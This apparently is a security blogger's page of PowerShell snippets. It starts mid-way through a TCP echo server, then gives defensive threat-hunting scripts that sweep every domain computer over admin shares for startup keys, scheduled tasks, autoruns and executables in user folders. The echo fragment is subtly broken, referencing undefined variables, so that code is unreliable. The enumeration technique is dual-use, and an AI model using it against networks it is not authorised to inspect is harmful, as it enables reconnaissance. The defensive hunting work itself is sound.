$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;

try
{
    do
    {
    $read = $null;
    while($stream.DataAvailable -or $read -eq $null) {
    $read = $stream.Read($buffer, 0, 2048);
    if ($read -gt 0) {
                    $data = [System.Text.Encoding]::ASCII.GetString($buffer).Trim(0x00).TrimEnd()
                    $buffer.Clear()
                    if($data -ne $null -and $data .Length -gt 0){
                        Write-Output ("RECEIVED : [{0}]" -f $data)
                        $sendBack = new-object System.Byte[] 2048;
                        $sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
                        $stream.Write($sendBack, 0, $results.Length)
                        $sendBack.Clear()
                        Write-Output ("SENT BACK: [{0}]" -f $data)
                            }
    }
    }
    } While ($read -gt 0);
}
finally
{
    $fileStream.Close();
    $socket.Stop();
    $client.close();
    $stream.Dispose();
}

SID to UserID, UserID to SID

This blog
https://community.spiceworks.com/how_to/2776-powershell-sid-to-user-and-user-to-sid

by SpoonerTech at Spiceworks was very helpful at going back and forth using powershell to and from a User Id or a SID #

Thanks,

Step 1: Domain User to SID

This will give you a Domain User's SID

$objUser = New-Object System.Security.Principal.NTAccount("DOMAIN_NAME", "USER_NAME")
$strSID = $objUser.Translate([System.Security.Principal.SecurityIdentifier])
$strSID.Value

Step 2: SID to Domain User

This will allow you to enter a SID and find the Domain User

$objSID = New-Object System.Security.Principal.SecurityIdentifier `
("ENTER-SID-HERE")
$objUser = $objSID.Translate( [System.Security.Principal.NTAccount])
$objUser.Value

Powershell script to find startup registries

$pcs = Get-ADComputer -Filter "Name -like '*'" | select-object name

$strRegType = [Microsoft.Win32.RegistryHive]::LocalMachine

foreach ($pc in $pcs) {

    $computername = $pc.name

    if(Test-Connection -ComputerName $computername -Count 1 -Quiet){

        Try

        {

            $strRegKey  = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey($strRegType, $computername)

            $strKeyGroup = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"

            #$strKeyGroup = $strSID + "\Software\Microsoft\Windows\CurrentVersion\RunOnce\"

            #$strKeyGroup = $strSID + "\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\"

            #$strKeyGroup = $strSID + "\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"

            $strRegSubKey  = $strRegKey.OpenSubKey($strKeyGroup)

            $names = $strRegSubKey.GetValueNames()

            foreach( $name in $names) {

                $value = $strRegSubKey.GetValue($name)

                $str = $computername + "," + $name + "," + $value

                Write-Host $str

            }

            $strRegKey.Close()

        }

        Catch

        {

            $str = $computername + "," + ","

            Write-Host $str

        }

    }

    else{

        $str = $computername + "," + ","

        Write-Host $str

    }

}

Powershell script to find all scheduled tasks

$erroractionPreference="stop"

$pcs = Get-ADComputer -Filter "Name -like '*'" | select-object name

foreach ($pc in $pcs) {

    $computername = $pc.name

    if(Test-Connection -ComputerName $computername -Count 1 -Quiet){

        Try

        {

            $path = "\\" + $computername + "\c$\Windows\System32\Tasks"

            $tasks = Get-ChildItem -Path $path -File

            foreach($task in $tasks){

                $str = $computername + "," + $task

                Write-Host $str   

            }

        }

        Catch

        {

            $str = $computername + ","

            Write-Host $str

        }

    }

    else{

        $str = $computername + ","

        Write-Host $str

    }

}

Powershell script to find all exes in Downloads folder

$erroractionPreference="stop"

$pcs = Get-ADComputer -Filter "Name -like '*'" | select-object name

$pccount = $pcs.Count

$counter = 1

foreach ($pc in $pcs) {

    $computername = $pc.name

    if(Test-Connection -ComputerName $computername -Count 1 -Quiet){

        Try

        {

            $path = "\\" + $computername + "\c$\users"

            $users = Get-ChildItem -Path $path

            foreach($user in $users){

                $downloads = $path + "\" + $user + "\Downloads"

                Write-Host $counter" of "$pccount" Searching "$downloads

                $downloadexes = Get-ChildItem $downloads -Filter *.exe | select fullname

                foreach($file in $downloadexes){

                    $filepath = $file.FullName

                    $hashes = Get-FileHash -Algorithm MD5 $filepath | select Path, Hash

                    foreach($hash in $hashes){

                        $result = $computername + "`t" + $hash.Hash + "`t" + $hash.Path

                        Write-Host $result

                    }

                }

                $downloadmsis = Get-ChildItem $downloads -Filter *.msi | select fullname

                foreach($file in $downloadmsis){

                    $filepath = $file.FullName

                    $hashes = Get-FileHash -Algorithm MD5 $filepath | select Path, Hash

                    foreach($hash in $hashes){

                        $result = $computername + "`t" + $hash.Hash + "`t" + $hash.Path

                        Write-Host $result

                    }

                }

            }

        }

        Catch

        {

        Write-Host $counter" of "$pccount" Search Error "$computername

        }

    }

    else{

        Write-Host $counter" of "$pccount" Search Connection Failure "$computername

    }

    $counter++

}

Powershell script to find all folders in program files

$erroractionPreference="stop"

$pcs = Get-ADComputer -Filter "Name -like '*'" | select-object name

$pccount = $pcs.Count

$counter = 1

foreach ($pc in $pcs) {

    $computername = $pc.name

    if(Test-Connection -ComputerName $computername -Count 1 -Quiet){

        Try

        {

            $path = "\\" + $computername + "\c$\program files\"

            $programs1 = Get-ChildItem -Path $path

            foreach($program in $programs1){

                Write-Host $computername","$program

            }

            $path = "\\" + $computername + "\c$\program files (x86)\"

            $programs2 = Get-ChildItem -Path $path

            foreach($program in $programs2){

                Write-Host $computername","$program

            }

        }

        Catch

        {

        Write-Host $counter" of "$pccount" Search Error "$computername

        }

    }

    else{

        Write-Host $counter" of "$pccount" Search Connection Failure "$computername

    }

    $counter++

}

Powershell script to find autorun keys

$pcs = Get-ADComputer -Filter "Name -like '*'" | select-object name

$pccount = $pcs.Count

$counter = 1

foreach ($pc in $pcs) {

    $computername = $pc.name

    if(Test-Connection -ComputerName $computername -Count 1 -Quiet){

        Try

        {

            Get-WmiObject -Class win32_startupcommand -ComputerName $computername | select PSComputername, @{l=",1";e={","}}, Name, @{l=",2";e={","}}, Command, @{l=",3";e={","}}, Location | Format-Table -AutoSize

        }

        Catch

        {

            Write-Host $counter" of "$pccount" Search Error "$computername" "$user" "$_

        }

    }

    else{

        Write-Host $counter" of "$pccount" Search Connection Failure "$computername

    }

    $counter++

}

Powershell script to find executables in Public folder

$erroractionPreference="stop"

$pcs = Get-ADComputer -Filter "Name -like '*'" | select-object name

$pccount = $pcs.Count

$counter = 1

foreach ($pc in $pcs) {

    $computername = $pc.name

    if(Test-Connection -ComputerName $computername -Count 1 -Quiet){

        Try

        {

            $path = "\\" + $computername + "\c$\users\public"

            Write-Host $counter" of "$pccount" Searching "$path

            $files = Get-ChildItem -Path $path | Where-Object {$_.Name -match "\.(exe|jar|msi|zip|js|vbs|ps1|bat|py|rar|hta)$" } | select fullname

            foreach($file in $files){

                Get-FileHash -Algorithm md5 $file.FullName | select Path, @{l=",";e={","}}, Hash | Format-Table -AutoSize

            }

        }

        Catch

        {

        Write-Host $counter" of "$pccount" Search Error "$computername

        }

    }

    else{

        Write-Host $counter" of "$pccount" Search Connection Failure "$computername

    }

    $counter++

}

Powershell Module to query the SANS ISC API

I listed to a great #SansAtNight talk at #SANSMinneapolis about the @sans_isc by @johullrich and thought I'd try to help out a little with a stormcenter PS module

The SANS ISC API Powershell module is at my github site

You can use it simply by doing commands like

Import-Module stormcenter
Get-ISCInfocon
Get-ISCHandler
Get-ISCIp 192.192.192.192
and many more

It is querying the SANS ISC API





More about neonprimetime

• neonprimetime pastebin
• neonprimetime virustotal
• @neonprimetime twitter
• neonprimetime reddit

Top Blogs of all-time

1. pagerank botnet sql injection walk-thru
2. DOM XSS 101 Walk-Through
3. An Invoice email and a Hot mess of Java

Top Github Contributions

1. Qualys Scantronitor 2.0
2. SANS ISC API Powershell Module

Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.